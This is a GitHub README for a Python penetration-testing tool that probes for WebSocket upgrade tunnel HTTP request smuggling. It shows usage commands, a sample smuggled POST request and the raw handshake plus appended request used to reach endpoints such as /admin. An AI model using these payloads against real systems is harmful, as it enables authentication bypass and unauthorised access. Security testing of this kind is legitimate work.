Skip to content

ordinary-hacker/ws-smuggler

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
.gitignore
.gitignore
 
 
README.md
README.md
 
 
requirements.txt
requirements.txt
 
 
ws_smuggler.py
ws_smuggler.py
 
 

Repository files navigation

ws_smuggler.py

A CLI tool to test for WebSocket Upgrade Tunnel HTTP Request Smuggling vulnerabilities. This technique abuses misconfigured frontends (e.g., proxies, CDNs) that assume WebSocket upgrades are successful and tunnel raw traffic to backends that may not have switched protocols.

By crafting invalid upgrade requests and appending a second HTTP request, this tool attempts to identify systems vulnerable to request smuggling and security bypasses.

🚀 Features

  • Sends invalid WebSocket upgrade requests

  • Attempts to smuggle arbitrary HTTP requests through the tunnel

  • Auto-generates simple GET requests or allows full custom smuggled request files

  • Supports:

    • HTTPS
    • Custom timeouts
    • Verbose / quiet modes
    • Response analysis and status code parsing

🛠️ Installation

Requirements

  • Python 3.6+
  • termcolor library:
pip install termcolor

Or:

pip install -r requirements.txt

🧪 Usage

python3 ws_smuggler.py [options] <url> <smuggled_path>

🔹 Example: Default GET request

python3 ws_smuggler.py http://target.site/ /admin

🔹 Example: Custom request from file

python3 ws_smuggler.py https://example.com/ /admin --request my_payload.txt

🔹 Optional Flags

Option Description
--version Custom Sec-WebSocket-Version header (default: 9999)
--timeout Socket timeout in seconds (default: 5.0)
--request Load full smuggled HTTP request from a .txt file
--show-payload Print the full raw payload before sending
--verbose Show all request/response output
--quiet Suppress all non-critical output

📂 Custom Request Format

When using --request, the file should contain a full, valid HTTP request (e.g., a POST with headers and body):

POST /internal HTTP/1.1
Host: target.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

username=admin&pw=1

🔍 How It Works

  1. Sends a fake WebSocket handshake using an invalid version:

    GET / HTTP/1.1
Host: target
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Version: 9999

  2. Appends a second HTTP request right after:

    GET /admin HTTP/1.1
Host: target

  3. If the frontend tunnels blindly and the backend keeps interpreting HTTP, the second request may execute — indicating a vulnerability.

🛡️ Detection Logic

  • Multiple HTTP responses detected from the same connection

  • Focus on the status of the second response (e.g., 200 OK, 403, etc.)

  • Useful for finding:

    • Auth bypasses
    • WAF/proxy misconfigurations
    • Cache or internal endpoint exposures

📄 License

MIT License

📫 Author

Built by 0rd1n4ry — based on smuggling techniques described by 0ang3el, James Kettle, and others in the research community.

🧠 References

About

A CLI tool to test for WebSocket Upgrade Tunnel HTTP Request Smuggling vulnerabilities.

Topics

websocket python3 pentest-tool requestsmuggling

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages